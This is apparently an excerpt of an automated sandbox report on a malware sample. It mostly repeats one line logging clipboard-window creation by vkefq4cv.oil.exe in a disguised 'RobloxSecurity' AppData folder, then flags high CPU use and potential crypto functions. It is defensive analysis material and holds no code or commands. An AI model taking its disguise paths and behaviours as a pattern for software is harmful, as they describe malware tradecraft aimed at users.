Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_02B8E00C	0_2_02B8E00C
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06258E50	0_2_06258E50
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_0625A268	0_2_0625A268
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06250006	0_2_06250006
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06250040	0_2_06250040
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067EEDD1	0_2_067EEDD1
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06EF04F0	0_2_06EF04F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5B490	1_2_04F5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5B471	1_2_04F5B471
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08803A98	1_2_08803A98
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Code function: 4_2_00007FFD9B9A2B4C	4_2_00007FFD9B9A2B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B98830A	11_2_00007FFD9B98830A
